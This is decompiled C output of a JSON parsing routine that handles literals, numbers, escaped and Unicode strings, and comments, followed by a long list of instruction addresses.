				signed char* _t577;
				signed char* _t578;
				signed char* _t579;
				signed char* _t580;
				signed char* _t581;
				signed char* _t582;
				signed char* _t583;
				signed char* _t584;
				signed char* _t585;
				signed char* _t586;
				signed int _t588;
				char _t590;
				signed int _t594;
				void* _t596;
				signed int _t624;
				signed int _t642;
				signed int _t644;
				signed int _t648;
				signed int _t658;
				signed int _t664;
				signed int _t665;
				signed int _t666;
				intOrPtr _t667;
				void* _t669;
				void _t670;
				intOrPtr _t671;
				signed int _t674;
				signed int _t675;
				signed int _t676;
				signed int _t677;
				signed int _t683;
				void* _t689;
				void* _t690;
				signed long long* _t691;
				signed long long _t712;
				signed long long _t715;

				_v36 = 0;
				E009C4832( &_v116, 0, 0x34);
				_t387 = _a12;
				_t690 = _t689 + 0xc;
				_v40 = 0;
				_v52 = 0;
				_v64 = 0;
				_v60 = 0;
				_t567 = _a8;
				_v56 = _t567;
				if(_t387 >= 3 &&  *_t567 == 0xef && _t567[1] == 0xbb && _t567[2] == 0xbf) {
					_t567 =  &(_t567[3]);
					_t387 = _t387 - 3;
					_v56 = _t567;
				}
				_t712 =  *0x9cfbf8;
				_v32 = _t387 + _t567;
				_t588 = 6;
				_t390 = memcpy( &_v104, _a4, _t588 << 2);
				_t691 = _t690 + 0xc;
				_v112 = _t390;
				_v112 = _v112 - 8;
				_v108 = _t390 - 8;
				_v80 = 1;
				while(1) {
					L6:
					_v24 = _v24 & 0x00000000;
					_t664 = 0;
					_v28 = _v28 & 0;
					_t669 = 0;
					_t642 = 8;
					_a12 = 0;
					_v16 = 0;
					_v20 = 0;
					_v12 = _t642;
					_v72 = 1;
					while(1) {
						_v76 = _t567;
						if(_t567 != _v32) {
							_t590 =  *_t567;
						} else {
							_t590 = 0;
						}
						L10:
						_a11 = _t590;
						if((_t642 & 0x00000020) == 0) {
							L71:
							if((_v100 & 0x00000001) == 0) {
								L100:
								if(_t642 >= 0) {
									if((_t642 & 0x00000008) == 0) {
										_t259 = _t669 + 4; // 0x4
										_t394 = _t259;
										_t670 =  *_t394;
										_a4 = _t394;
										if(_t670 == 1) {
											st0 = _t712;
											_t396 = _t590 - 9;
											if(_t396 == 0) {
												L240:
												_t669 = _v16;
												L241:
												_t397 = _v80;
												L242:
												_t712 =  *0x9cfbf8;
												_t567 =  &(_t567[1]);
												_v76 = _t567;
												if(_t567 != _v32) {
													_t590 =  *_t567;
												} else {
													_t590 = 0;
												}
												goto L10;
											}
											_t527 = _t396 - 1;
											if(_t527 == 0) {
												_v72 = _v72 + 1;
												_v68 = _v68 & 0x00000000;
												goto L240;
											}
											_t528 = _t527 - 3;
											if(_t528 == 0) {
												goto L240;
											}
											_t529 = _t528 - 0x13;
											if(_t529 == 0) {
												goto L240;
											}
											_t531 = _t529;
											if(_t531 == 0) {
												if((_t642 & 0x00000004) != 0) {
													L247:
													_t568 = _v80;
													_t405 =  !=  ? _v28 : _v36;
													if(_t405 == 0) {
														L249:
														if(_t568 == 0) {
															E009CC474( &_v104, _v28);
														}
														return 0;
													} else {
														goto L248;
													}
													do {
														L248:
														_t671 =  *((intOrPtr*)(_t405 + 0x10));
														_v92(_t405);
														_t405 = _t671;
													} while (_t671 != 0);
													goto L249;
												}
												_t669 = _v16;
												_t642 = _t642 | 0x00000020;
												_t664 = 0;
												_v12 = _t642;
												_a12 = 0;
												_v24 =  *((intOrPtr*)(_t669 + 0x10));
												L227:
												if((_t642 & 0x00000002) != 0) {
													_t642 = _t642 & 0xfffffffd;
													_t567 = _t567 - 1;
													_v12 = _t642;
													_v76 = _t567;
												}
												if((_t642 & 0x00000001) != 0) {
													_t410 =  *_t669;
													_t644 = _t642 & 0xfffffffe | 0x00000004;
													_t594 = _t644;
													if(_t410 != 0) {
														_t642 =  !=  ? _t594 : _t644 | 0x00000008;
														_v12 = _t642;
														if(_v80 == 0) {
															_t596 =  *((intOrPtr*)(_t410 + 4)) - 1;
															if(_t596 == 0) {
																 *((intOrPtr*)( *(_t410 + 8) * 0xc +  *((intOrPtr*)(_t410 + 0xc)) + 8)) = _t669;
															} else {
																if(_t596 == 1) {
																	 *((intOrPtr*)( *((intOrPtr*)(_t410 + 0xc)) +  *(_t410 + 8) * 4)) = _t669;
																}
															}
														}
														_t411 =  *_t669;
														 *((intOrPtr*)(_t411 + 8)) =  *((intOrPtr*)(_t411 + 8)) + 1;
														if( *((intOrPtr*)(_t411 + 8)) > _v112) {
															goto L247;
														} else {
															_t669 =  *_t669;
															_v16 = _t669;
															_v20 = _t669;
															goto L241;
														}
													}
													_t642 = _t644 | 0x00000080;
													L82:
													_v12 = _t642;
												}
												goto L241;
											}
											_t533 = _t531 - 0xa;
											if(_t533 == 0) {
												if((_t642 & 0x00000004) == 0) {
													goto L247;
												}
												_t642 = _t642 & 0xfffffffb;
												L220:
												_v12 = _t642;
												L226:
												_t669 = _v16;
												goto L227;
											}
											if(_t533 != 0x51) {
												goto L247;
											}
											_t642 = _t642 & 0xfffffffb | 0x00000001;
											goto L220;
										}
										_t261 = _t670 - 3; // -3
										if(_t261 > 1) {
											st0 = _t712;
											goto L226;
										}
										if(_t590 - 0x30 > 9) {
											if(_t590 == 0x2b || _t590 == 0x2d) {
												if((_t642 & 0x00000c00) != 0x400) {
													goto L194;
												}
												st0 = _t712;
												_t642 =  !=  ? _t642 | 0x00000800 : _t642 | 0x1800;
												_v12 = _t642;
												goto L240;
											} else {
												if(_t590 != 0x2e || _t670 != 3) {
													L194:
													if((_t642 & 0x00000400) != 0) {
														if(_v40 == 0) {
															L246:
															st0 = _t712;
															goto L247;
														}
														_t540 = _v52;
														_t601 =  ~_t540;
														_t541 =  !=  ?  ~_t540 : _t540;
														 *_t691 = _t712;
														E009CC4DA( !=  ?  ~_t540 : _t540,  ~_t540, _t642 & 0x00001000,  ~_t540, _t601,  !=  ?  ~_t540 : _t540);
														_t669 = _v16;
														_t691 =  &(_t691[1]);
														_t642 = _v12;
														 *(_t669 + 8) = _t712 *  *(_t669 + 8);
														L206:
														if((_t642 & 0x00000100) != 0) {
															if( *_a4 != 3) {
																asm("fchs");
															} else {
																 *(_t669 + 8) =  ~( *(_t669 + 8));
																asm("adc eax, 0x0");
																 *(_t669 + 0xc) =  ~( *(_t669 + 0xc));
															}
														}
														_t642 = _t642 | 0x00000003;
														L211:
														_v12 = _t642;
														goto L227;
													}
													if(_t670 != 4) {
														_t669 = _v16;
														st0 = _t712;
														L199:
														if(_t590 == 0x65 || _t590 == 0x45) {
															_t546 = _a4;
															_t648 = _t642 | 0x00000400;
															if( *_t546 == 3) {
																 *_t546 = 4;
																asm("fild qword [esi+0x8]");
																 *(_t669 + 8) = _t712;
															}
															_v40 = _v40 & 0x00000000;
															_t642 = _t648 & 0xfffffdff;
															goto L82;
														} else {
															goto L206;
														}
													}
													_t547 = _v40;
													if(_v40 == 0) {
														goto L246;
													}
													asm("fild qword [ebp-0x3c]");
													_v48 = _t712;
													_t715 = _v48;
													_v48 = _t715;
													 *_t691 = _t715;
													E009CC4DA(_t547, _t590, _t642, _t590, _t590, _t547);
													asm("fdivr qword [ebp-0x2c]");
													_t691 =  &(_t691[1]);
													_t549 = _v16;
													_t669 = _v20;
													_t567 = _v76;
													_t642 = _v12;
													_t590 = _a11;
													_v16 = _t669;
													_t712 = _t715 +  *(_t549 + 8);
													 *(_t549 + 8) = _t712;
													goto L199;
												} else {
													st0 = _t712;
													if(_v40 == 0) {
														goto L247;
													}
													_t669 = _v16;
													_v40 = _v40 & 0x00000000;
													 *_a4 = 4;
													asm("fild qword [esi+0x8]");
													 *(_t669 + 8) = _t712;
													goto L241;
												}
											}
										}
										st0 = _t712;
										_t554 = _v40 + 1;
										_v40 = _t554;
										if(_t670 == 3) {
											if((_t642 & 0x00000400) != 0) {
												L185:
												_t642 = _t642 | 0x00000800;
												_v12 = _t642;
												_v52 = _a11 + 0xffffffd0 + _v52 * 0xa;
												goto L240;
											}
											if((0x00000200 & _t642) != 0) {
												goto L247;
											}
											if(_t554 == 1 && _t590 == 0x30) {
												_t642 = _t642 | 0x00000200;
												_v12 = _t642;
											}
											asm("cdq");
											_t665 = _t642;
											_t561 = E009CC6F0( *((intOrPtr*)(_v16 + 8)),  *((intOrPtr*)(_v16 + 0xc)), 0xa, 0);
											_t562 = _v16;
											asm("adc edi, edx");
											_t642 = _v12;
											 *((intOrPtr*)(_t562 + 8)) = _t590 - 0x30 + _t561;
											_t669 = _t562;
											 *(_t669 + 0xc) = _t665;
											_t664 = _a12;
											goto L241;
										}
										if((_t642 & 0x00000400) != 0) {
											goto L185;
										}
										asm("cdq");
										_t666 = _t642;
										_v64 = _t590 - 0x30 + E009CC6F0(_v64, _v60, 0xa, 0);
										asm("adc edi, edx");
										_t642 = _v12;
										_v60 = _t666;
										_t664 = _a12;
										goto L240;
									}
									st0 = _t712;
									_t399 = _t590 - 9;
									if(_t399 == 0) {
										goto L241;
									}
									_t400 = _t399 - 1;
									if(_t400 == 0) {
										L107:
										_v72 = _v72 + 1;
										_v68 = _v68 & 0x00000000;
										goto L241;
									}
									_t401 = _t400 - 3;
									if(_t401 == 0) {
										goto L241;
									}
									_t402 = _t401 - 0x13;
									if(_t402 == 0) {
										goto L241;
									}
									if(_t402 == 0x3d) {
										if(_t669 == 0 ||  *((intOrPtr*)(_t669 + 4)) != 2) {
											goto L247;
										} else {
											_t642 = _t642 & 0xfffffff3 | 0x00000001;
											goto L211;
										}
									}
									if((_t642 & 0x00000004) == 0) {
										if((_t642 & 0x00000040) == 0) {
											_v12 = _t642 & 0xfffffff7;
											if(_t590 == 0x22) {
												_t419 = E009CC51F( &_v116,  &_v20,  &_v28,  &_v36, 5); // executed
												_t691 =  &(_t691[2]);
												if(_t419 == 0) {
													goto L247;
												}
												_t669 = _v20;
												_t567 = _v76;
												_t642 = _v12 | 0x00000020;
												_t664 = 0;
												_v12 = _t642;
												_v16 = _t669;
												_v24 =  *(_t669 + 0xc);
												_a12 = 0;
												goto L241;
											}
											if(_t590 == 0x5b) {
												_t424 = E009CC51F( &_v116,  &_v20,  &_v28,  &_v36, 2);
												_t691 =  &(_t691[2]);
												if(_t424 == 0) {
													goto L247;
												}
												_t669 = _v20;
												_t642 = _v12 | 0x00000008;
												_t567 = _v76;
												_v12 = _t642;
												_v16 = _t669;
												goto L241;
											}
											if(_t590 == 0x66) {
												if(_v32 - _t567 < 4) {
													goto L247;
												}
												_t569 =  &(_t567[1]);
												_v76 = _t569;
												if( *_t569 != 0x61) {
													goto L247;
												}
												_t570 =  &(_t569[1]);
												_v76 = _t570;
												if( *_t570 != 0x6c) {
													goto L247;
												}
												_t571 =  &(_t570[1]);
												_v76 = _t571;
												if( *_t571 != 0x73) {
													goto L247;
												}
												_t572 =  &(_t571[1]);
												_v76 = _t572;
												if( *_t572 != 0x65) {
													goto L247;
												}
												_push(6);
												L164:
												_push( &_v36);
												_push( &_v28);
												_push( &_v20);
												_push( &_v116);
												_t431 = E009CC51F();
												_t691 =  &(_t691[2]);
												if(_t431 == 0) {
													goto L247;
												}
												_t669 = _v20;
												_t642 = _v12 | 0x00000001;
												_t567 = _v76;
												_v12 = _t642;
												_v16 = _t669;
												goto L227;
											}
											if(_t590 == 0x6e) {
												if(_v32 - _t567 < 3) {
													goto L247;
												}
												_t573 =  &(_t567[1]);
												_v76 = _t573;
												if( *_t573 != 0x75) {
													goto L247;
												}
												_t574 =  &(_t573[1]);
												_v76 = _t574;
												if( *_t574 != 0x6c) {
													goto L247;
												}
												_t575 =  &(_t574[1]);
												_v76 = _t575;
												if( *_t575 != 0x6c) {
													goto L247;
												}
												_push(7);
												goto L164;
											}
											if(_t590 == 0x74) {
												if(_v32 - _t567 < 3) {
													goto L247;
												}
												_t576 =  &(_t567[1]);
												_v76 = _t576;
												if( *_t576 != 0x72) {
													goto L247;
												}
												_t577 =  &(_t576[1]);
												_v76 = _t577;
												if( *_t577 != 0x75) {
													goto L247;
												}
												_t578 =  &(_t577[1]);
												_v76 = _t578;
												if( *_t578 != 0x65) {
													goto L247;
												}
												_t440 = E009CC51F( &_v116,  &_v20,  &_v28,  &_v36, 6);
												_t691 =  &(_t691[2]);
												if(_t440 == 0) {
													goto L247;
												}
												_t669 = _v20;
												_t567 = _v76;
												_t642 = _v12 | 1;
												_v16 = _t669;
												 *(_t669 + 8) = 1;
												_v12 = _t642;
												goto L227;
											}
											if(_t590 == 0x7b) {
												_t447 = E009CC51F( &_v116,  &_v20,  &_v28,  &_v36, 1);
												_t691 =  &(_t691[2]);
												if(_t447 == 0) {
													goto L247;
												}
												_t669 = _v20;
												_t567 = _v76;
												_t642 = _v12;
												_v16 = _t669;
												goto L241;
											}
											if(_t590 < 0x30 || _t590 > 0x39) {
												if(_t590 != 0x2d) {
													goto L247;
												}
												goto L129;
											} else {
												L129:
												_t452 = E009CC51F( &_v116,  &_v20,  &_v28,  &_v36, 3);
												_t691 =  &(_t691[2]);
												if(_t452 == 0) {
													goto L247;
												}
												_t567 = _v76;
												if(_v80 != 0) {
													_v40 = _v40 & 0x00000000;
													_t658 = _v12 & 0xffffe0ff;
													_v64 = _v64 & 0x00000000;
													_v60 = _v60 & 0x00000000;
													_v52 = _v52 & 0x00000000;
													_t669 = _v20;
													_v16 = _t669;
													if(_a11 == 0x2d) {
														_t642 = _t658 | 0x00000100;
														goto L82;
													}
													_t642 = _t658 | 0x00000002;
													goto L211;
												}
												_t453 = _a11;
												_t667 = _v32;
												L132:
												while(1) {
													if(_t453 < 0x30 || _t453 > 0x39) {
														if(_t453 == 0x2b || _t453 == 0x2d || _t453 == 0x65 || _t453 == 0x45 || _t453 == 0x2e) {
															goto L139;
														} else {
															goto L141;
														}
													} else {
														L139:
														_t567 =  &(_t567[1]);
														_v76 = _t567;
														if(_t567 == _t667) {
															L141:
															_t669 = _v20;
															_t642 = _v12 | 0x00000003;
															_t664 = _a12;
															_v12 = _t642;
															_v16 = _t669;
															goto L227;
														}
														_t453 =  *_t567;
														continue;
													}
												}
											}
										}
										if(_t590 != 0x3a) {
											goto L247;
										}
										_t642 = _t642 & 0xffffffbf;
										goto L82;
									}
									if(_t590 != 0x2c) {
										goto L247;
									}
									_t642 = _t642 & 0xfffffffb;
									goto L82;
								}
								if(_t590 == 0) {
									_t372 =  &_v80;
									 *_t372 = _v80 - 1;
									_t454 = _v28;
									_v36 = _t454;
									if( *_t372 < 0) {
										st0 = _t712;
										return _t454;
									}
									_t397 = _v80;
									_t567 = _v56;
									goto L6;
								}
								st0 = _t712;
								_t456 = _t590 - 9;
								if(_t456 == 0) {
									goto L241;
								}
								_t457 = _t456 - 1;
								if(_t457 == 0) {
									goto L107;
								}
								_t458 = _t457 - 3;
								if(_t458 == 0) {
									goto L241;
								}
								if(_t458 != 0x13) {
									goto L247;
								}
								goto L241;
							}
							if((_t642 & 0x00006000) == 0) {
								if(_t590 != 0x2f) {
									goto L100;
								}
								st0 = _t712;
								if((_t642 & 0x00000088) != 0 ||  *((intOrPtr*)(_t669 + 4)) == 1) {
									_t567 =  &(_t567[1]);
									_v76 = _t567;
									if(_t567 == _v32) {
										goto L247;
									}
									_t460 =  *_t567;
									if(_t460 == 0x2a) {
										_t642 = _t642 | 0x00004000;
										goto L82;
									}
									if(_t460 != 0x2f) {
										goto L247;
									}
									_t642 = _t642 | 0x00002000;
									goto L82;
								} else {
									goto L247;
								}
							}
							if((_t642 & 0x00002000) == 0) {
								if((_t642 & 0x00004000) == 0) {
									goto L100;
								}
								st0 = _t712;
								if(_t590 == 0) {
									goto L247;
								}
								if(_t590 != 0x2a) {
									goto L242;
								}
								if(_t567 >= _v32 - 1) {
									goto L241;
								}
								_t397 = _v80;
								if(_t567[1] == 0x2f) {
									_t642 = _t642 & 0xffffbfff;
									_t567 =  &(_t567[1]);
									_v12 = _t642;
								}
								goto L242;
							}
							st0 = _t712;
							if(_t590 == 0xd || _t590 == 0xa || _t590 == 0) {
								_t642 = _t642 & 0xffffdfff;
								_t567 = _t567 - 1;
								_v12 = _t642;
							}
							goto L242;
						}
						if(_t590 == 0 || _t664 > _v112) {
							goto L246;
						} else {
							if((_t642 & 0x00000010) == 0) {
								if(_t590 != 0x5c) {
									if(_t590 != 0x22) {
										st0 = _t712;
										L84:
										if(_t397 == 0) {
											 *((char*)(_t664 + _v24)) = _t590;
											_t669 = _v16;
										}
										L62:
										_t664 = _t664 + 1;
										_a12 = _t664;
										goto L242;
									}
									if(_t397 == 0) {
										 *((char*)(_t664 + _v24)) = 0;
									}
									_t642 = _t642 & 0xffffffdf;
									_v24 = _v24 & 0x00000000;
									_v12 = _t642;
									_t462 =  *((intOrPtr*)(_t669 + 4)) - 1;
									if(_t462 == 0) {
										st0 = _t712;
										if(_v80 == 0) {
											 *((intOrPtr*)( *(_t669 + 8) * 0xc +  *(_t669 + 0xc))) =  *((intOrPtr*)(_t669 + 0x10));
											_t642 = _v12;
											 *( *(_t669 + 8) * 0xc +  *(_t669 + 0xc) + 4) = _t664;
											_t142 = _t664 + 1; // 0x9
											 *((intOrPtr*)(_t669 + 0x10)) =  *((intOrPtr*)(_t669 + 0x10)) + _t142;
										} else {
											_t130 = _t664 + 1; // 0x9
											 *(_t669 + 0xc) =  *(_t669 + 0xc) + _t130;
										}
										_t642 = _t642 | 0x00000048;
										goto L82;
									} else {
										_t397 = _v80;
										if(_t462 == 4) {
											_t642 = _t642 | 0x00000001;
											 *(_t669 + 8) = _t664;
											_v12 = _t642;
										}
										goto L71;
									}
								}
								_t642 = _t642 | 0x00000010;
								st0 = _t712;
								_v12 = _t642;
								goto L242;
							}
							_t642 = _t642 & 0xffffffef;
							_v12 = _t642;
							st0 = _t712;
							_t469 = _t590 - 0x62;
							if(_t469 == 0) {
								_t397 = _v80;
								if(_t397 == 0) {
									 *((char*)(_t664 + _v24)) = 8;
								}
								goto L62;
							}
							_t472 = _t469 - 4;
							if(_t472 == 0) {
								_t397 = _v80;
								if(_t397 == 0) {
									 *((char*)(_t664 + _v24)) = 0xc;
								}
								goto L62;
							}
							_t473 = _t472 - 8;
							if(_t473 == 0) {
								_t397 = _v80;
								if(_t397 == 0) {
									 *((char*)(_t664 + _v24)) = 0xa;
								}
								goto L62;
							}
							_t474 = _t473 - 4;
							if(_t474 == 0) {
								_t397 = _v80;
								if(_t397 == 0) {
									 *((char*)(_t664 + _v24)) = 0xd;
								}
								goto L62;
							}
							_t476 = _t474;
							if(_t476 == 0) {
								_t397 = _v80;
								if(_t397 == 0) {
									 *((char*)(_t664 + _v24)) = 9;
								}
								goto L62;
							}
							if(_t476 == 1) {
								if(_v32 - _t567 <= 4) {
									goto L247;
								}
								_t579 =  &(_t567[1]);
								_v76 = _t579;
								_t481 = E009CB79E( *_t579 & 0x000000ff);
								_a11 = _t481;
								if(_t481 == 0xff) {
									goto L247;
								}
								_t580 =  &(_t579[1]);
								_v76 = _t580;
								_t482 = E009CB79E( *_t580 & 0x000000ff);
								_a15 = _t482;
								if(_t482 == 0xff) {
									goto L247;
								}
								_t581 =  &(_t580[1]);
								_v76 = _t581;
								_t483 = E009CB79E( *_t581 & 0x000000ff);
								_a7 = _t483;
								if(_t483 == 0xff) {
									goto L247;
								}
								_t567 =  &(_t581[1]);
								_v76 = _t567;
								_t484 = E009CB79E( *_t567 & 0x000000ff);
								_v5 = _t484;
								if(_t484 == 0xff) {
									goto L247;
								}
								_t674 = _a11 << 0x00000004 & 0x000000ff | _a15 & 0x000000ff;
								_v44 = _t674;
								_t624 = _t674 << 0x00000008 | _a7 << 0x00000004 & 0x000000ff | _v5 & 0x000000ff;
								_v44 = _t624;
								if((_t624 & 0x0000f800) != 0xd800) {
									L35:
									_t397 = _v80;
									if(_t624 > 0x7f) {
										if(_t624 > 0x7ff) {
											if(_t624 > 0xffff) {
												if(_t397 == 0) {
													_t675 = _v24;
													 *(_t664 + _t675) = _t624 >> 0x00000012 | 0x000000f0;
													 *(_t664 + _t675 + 1) = _t624 >> 0x0000000c & 0x0000003f | 0x00000080;
													 *(_t664 + _t675 + 2) = _t624 >> 0x00000006 & 0x0000003f | 0x00000080;
													 *(_t664 + _t675 + 3) = _t624 & 0x0000003f | 0x00000080;
													_t664 = _t664 + 4;
													L44:
													_a12 = _t664;
													goto L240;
												}
												_t664 = _t664 + 4;
												goto L39;
											}
											if(_t397 == 0) {
												_t676 = _v24;
												 *(_t664 + _t676) = _t624 >> 0x0000000c | 0x000000e0;
												 *(_t664 + _t676 + 1) = _t624 >> 0x00000006 & 0x0000003f | 0x00000080;
												 *(_t664 + _t676 + 2) = _t624 & 0x0000003f | 0x00000080;
												_t664 = _t664 + 3;
												goto L44;
											} else {
												_t664 = _t664 + 3;
												goto L39;
											}
										}
										if(_t397 == 0) {
											_t677 = _v24;
											 *(_t664 + _t677) = _t624 >> 0x00000006 | 0x000000c0;
											 *(_t664 + _t677 + 1) = _t624 & 0x0000003f | 0x00000080;
											_t664 = _t664 + 2;
											goto L44;
										} else {
											_t664 = _t664 + 2;
											goto L39;
										}
									} else {
										if(_t397 == 0) {
											 *(_t664 + _v24) = _t624;
										}
										_t664 = _t664 + 1;
										L39:
										_t669 = _v16;
										_a12 = _t664;
										goto L242;
									}
								}
								if(_v32 - _t567 <= 6) {
									goto L247;
								}
								_t582 =  &(_t567[1]);
								_v76 = _t582;
								if( *_t582 != 0x5c) {
									goto L247;
								}
								_t583 =  &(_t582[1]);
								_v76 = _t583;
								if( *_t583 != 0x75) {
									goto L247;
								}
								_t584 =  &(_t583[1]);
								_v76 = _t584;
								if(E009CB79E( *_t584 & 0x000000ff) == 0xff) {
									goto L247;
								}
								_t585 =  &(_t584[1]);
								_v76 = _t585;
								_t519 = E009CB79E( *_t585 & 0x000000ff);
								_a11 = _t519;
								if(_t519 == 0xff) {
									goto L247;
								}
								_t586 =  &(_t585[1]);
								_v76 = _t586;
								_t520 = E009CB79E( *_t586 & 0x000000ff);
								_a15 = _t520;
								if(_t520 == 0xff) {
									goto L247;
								}
								_t567 =  &(_t586[1]);
								_v76 = _t567;
								_t521 = E009CB79E( *_t567 & 0x000000ff);
								_a7 = _t521;
								if(_t521 == 0xff) {
									goto L247;
								} else {
									_t683 = (_v44 & 0x000003bf | 0x00000040) << 0x00000002 | _a11 & 3;
									_v44 = _t683;
									_t624 = _t683 << 0x00000008 | _a15 << 0x00000004 & 0x000000ff | _a7 & 0x000000ff;
									goto L35;
								}
							} else {
								_t397 = _v80;
								goto L84;
							}
						}
					}
				}
			}


























































































































                                                                                                                                                            0x009cb83c
                                                                                                                                                            0x009cb83f
                                                                                                                                                            0x009cb844
                                                                                                                                                            0x009cb847
                                                                                                                                                            0x009cb84a
                                                                                                                                                            0x009cb84d
                                                                                                                                                            0x009cb850
                                                                                                                                                            0x009cb853
                                                                                                                                                            0x009cb856
                                                                                                                                                            0x009cb859
                                                                                                                                                            0x009cb85f
                                                                                                                                                            0x009cb872
                                                                                                                                                            0x009cb875
                                                                                                                                                            0x009cb878
                                                                                                                                                            0x009cb878
                                                                                                                                                            0x009cb881
                                                                                                                                                            0x009cb889
                                                                                                                                                            0x009cb891
                                                                                                                                                            0x009cb892
                                                                                                                                                            0x009cb892
                                                                                                                                                            0x009cb894
                                                                                                                                                            0x009cb89a
                                                                                                                                                            0x009cb89e
                                                                                                                                                            0x009cb8a4
                                                                                                                                                            0x009cb8a7
                                                                                                                                                            0x009cb8a7
                                                                                                                                                            0x009cb8a7
                                                                                                                                                            0x009cb8ab
                                                                                                                                                            0x009cb8ad
                                                                                                                                                            0x009cb8b0
                                                                                                                                                            0x009cb8b4
                                                                                                                                                            0x009cb8b5
                                                                                                                                                            0x009cb8b8
                                                                                                                                                            0x009cb8bb
                                                                                                                                                            0x009cb8be
                                                                                                                                                            0x009cb8c1
                                                                                                                                                            0x009cb8c8
                                                                                                                                                            0x009cb8c8
                                                                                                                                                            0x009cb8ce
                                                                                                                                                            0x009cb8d4
                                                                                                                                                            0x009cb8d0
                                                                                                                                                            0x009cb8d0
                                                                                                                                                            0x009cb8d0
                                                                                                                                                            0x009cb8d6
                                                                                                                                                            0x009cb8d6
                                                                                                                                                            0x009cb8dc
                                                                                                                                                            0x009cbc1b
                                                                                                                                                            0x009cbc1f
                                                                                                                                                            0x009cbd3e
                                                                                                                                                            0x009cbd40
                                                                                                                                                            0x009cbd83
                                                                                                                                                            0x009cc0ce
                                                                                                                                                            0x009cc0ce
                                                                                                                                                            0x009cc0d1
                                                                                                                                                            0x009cc0d3
                                                                                                                                                            0x009cc0d9
                                                                                                                                                            0x009cc314
                                                                                                                                                            0x009cc316
                                                                                                                                                            0x009cc319
                                                                                                                                                            0x009cc40c
                                                                                                                                                            0x009cc40c
                                                                                                                                                            0x009cc40f
                                                                                                                                                            0x009cc40f
                                                                                                                                                            0x009cc412
                                                                                                                                                            0x009cc412
                                                                                                                                                            0x009cc418
                                                                                                                                                            0x009cb8c8
                                                                                                                                                            0x009cb8ce
                                                                                                                                                            0x009cb8d4
                                                                                                                                                            0x009cb8d0
                                                                                                                                                            0x009cb8d0
                                                                                                                                                            0x009cb8d0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cb8d4
                                                                                                                                                            0x009cc31f
                                                                                                                                                            0x009cc322
                                                                                                                                                            0x009cc405
                                                                                                                                                            0x009cc408
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc408
                                                                                                                                                            0x009cc328
                                                                                                                                                            0x009cc32b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc331
                                                                                                                                                            0x009cc334
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc33b
                                                                                                                                                            0x009cc33e
                                                                                                                                                            0x009cc36a
                                                                                                                                                            0x009cc43b
                                                                                                                                                            0x009cc43b
                                                                                                                                                            0x009cc443
                                                                                                                                                            0x009cc449
                                                                                                                                                            0x009cc459
                                                                                                                                                            0x009cc45b
                                                                                                                                                            0x009cc464
                                                                                                                                                            0x009cc46a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc44b
                                                                                                                                                            0x009cc44b
                                                                                                                                                            0x009cc44b
                                                                                                                                                            0x009cc44f
                                                                                                                                                            0x009cc452
                                                                                                                                                            0x009cc455
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc44b
                                                                                                                                                            0x009cc370
                                                                                                                                                            0x009cc373
                                                                                                                                                            0x009cc376
                                                                                                                                                            0x009cc378
                                                                                                                                                            0x009cc37b
                                                                                                                                                            0x009cc381
                                                                                                                                                            0x009cc38b
                                                                                                                                                            0x009cc38e
                                                                                                                                                            0x009cc390
                                                                                                                                                            0x009cc393
                                                                                                                                                            0x009cc394
                                                                                                                                                            0x009cc397
                                                                                                                                                            0x009cc397
                                                                                                                                                            0x009cc39d
                                                                                                                                                            0x009cc39f
                                                                                                                                                            0x009cc3a4
                                                                                                                                                            0x009cc3a7
                                                                                                                                                            0x009cc3ab
                                                                                                                                                            0x009cc3bf
                                                                                                                                                            0x009cc3c6
                                                                                                                                                            0x009cc3c9
                                                                                                                                                            0x009cc3ce
                                                                                                                                                            0x009cc3d1
                                                                                                                                                            0x009cc3ea
                                                                                                                                                            0x009cc3d3
                                                                                                                                                            0x009cc3d6
                                                                                                                                                            0x009cc3de
                                                                                                                                                            0x009cc3de
                                                                                                                                                            0x009cc3d6
                                                                                                                                                            0x009cc3d1
                                                                                                                                                            0x009cc3ee
                                                                                                                                                            0x009cc3f0
                                                                                                                                                            0x009cc3f9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc3fb
                                                                                                                                                            0x009cc3fb
                                                                                                                                                            0x009cc3fd
                                                                                                                                                            0x009cc400
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc400
                                                                                                                                                            0x009cc3f9
                                                                                                                                                            0x009cc3ad
                                                                                                                                                            0x009cbc90
                                                                                                                                                            0x009cbc90
                                                                                                                                                            0x009cbc90
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc39d
                                                                                                                                                            0x009cc340
                                                                                                                                                            0x009cc343
                                                                                                                                                            0x009cc35c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc362
                                                                                                                                                            0x009cc354
                                                                                                                                                            0x009cc354
                                                                                                                                                            0x009cc388
                                                                                                                                                            0x009cc388
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc388
                                                                                                                                                            0x009cc348
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc351
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc351
                                                                                                                                                            0x009cc0df
                                                                                                                                                            0x009cc0e5
                                                                                                                                                            0x009cc386
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc386
                                                                                                                                                            0x009cc0f1
                                                                                                                                                            0x009cc1bc
                                                                                                                                                            0x009cc200
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc204
                                                                                                                                                            0x009cc216
                                                                                                                                                            0x009cc219
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc1c3
                                                                                                                                                            0x009cc1c6
                                                                                                                                                            0x009cc221
                                                                                                                                                            0x009cc227
                                                                                                                                                            0x009cc2ac
                                                                                                                                                            0x009cc439
                                                                                                                                                            0x009cc439
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc439
                                                                                                                                                            0x009cc2b2
                                                                                                                                                            0x009cc2b7
                                                                                                                                                            0x009cc2bf
                                                                                                                                                            0x009cc2c5
                                                                                                                                                            0x009cc2c8
                                                                                                                                                            0x009cc2cd
                                                                                                                                                            0x009cc2d0
                                                                                                                                                            0x009cc2d3
